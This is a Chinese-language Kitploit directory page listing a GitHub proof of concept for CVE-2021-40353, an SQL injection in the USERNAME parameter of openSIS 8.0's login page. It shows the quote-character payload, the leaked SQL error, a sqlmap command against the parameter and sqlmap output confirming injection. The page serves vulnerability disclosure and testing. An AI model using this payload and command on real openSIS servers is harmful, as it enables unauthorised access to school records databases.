Skip to content
KitploitKITPLOIT
工具博客
Log in
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-40353 — CVE-2021-40353 openSIS 8.0 SQL注入漏洞 | Kitploit
工具/GitHubGitHub/5qu1n7/cve-2021-40353
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试数据库安全
GitHub5qu1n7/cve-2021-40353

CVE-2021-40353

CVE-2021-40353 openSIS 8.0 SQL注入漏洞

查看仓库
5285年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2021-40353

CVE-2021-40353 openSIS 8.0 SQL注入漏洞 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40353

当使用MySQL或MariaDB作为应用程序数据库时,openSIS 8.0版本存在一个SQL注入漏洞。攻击者可以通过USERNAME参数执行SQL命令。

受影响PHP页面:

index.php - USERNAME参数

漏洞利用Payload ' - 会产生包含数据库信息的错误 " - 不会产生错误

错误信息

日期:

2021年8月31日 03:16:22

失败通知:

DB执行失败

SQL: UPDATE login_authentication SET FAILED_LOGIN=FAILED_LOGIN+1 WHERE UPPER(USERNAME)=UPPER('user1'') 回溯: C:\xampp\htdocs\opensis\index.php at 502 附加信息: SQL语法错误;请检查与您的MariaDB服务器版本对应的手册,以找出在 ''user1'')' 附近使用的正确语法 日期:

2021年8月31日 03:16:22

openSIS遇到错误,可能由以下任一原因引起:

无效数据输入
数据库SQL错误
程序错误

请截取此屏幕截图并发送给您的openSIS代表进行调试和解决。

sqlmap -r post_opensis -p USERNAME

[09:38:19] [INFO] POST参数 'USERNAME' 是 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' 可注入 [09:38:19] [INFO] 测试 'MySQL inline queries' [09:38:20] [INFO] 测试 'MySQL >= 5.0.12 stacked queries (comment)' [09:38:21] [INFO] 测试 'MySQL >= 5.0.12 stacked queries' [09:38:22] [INFO] 测试 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)' [09:38:22] [INFO] 测试 'MySQL >= 5.0.12 stacked queries (query SLEEP)' [09:38:23] [INFO] 测试 'MySQL < 5.0.12 stacked queries (heavy query - comment)' [09:38:23] [INFO] 测试 'MySQL < 5.0.12 stacked queries (heavy query)' [09:38:24] [INFO] 测试 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' [09:38:46] [INFO] POST参数 'USERNAME' 似乎是 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' 可注入

发现者:Brian Lowe,2021年8月

下载工具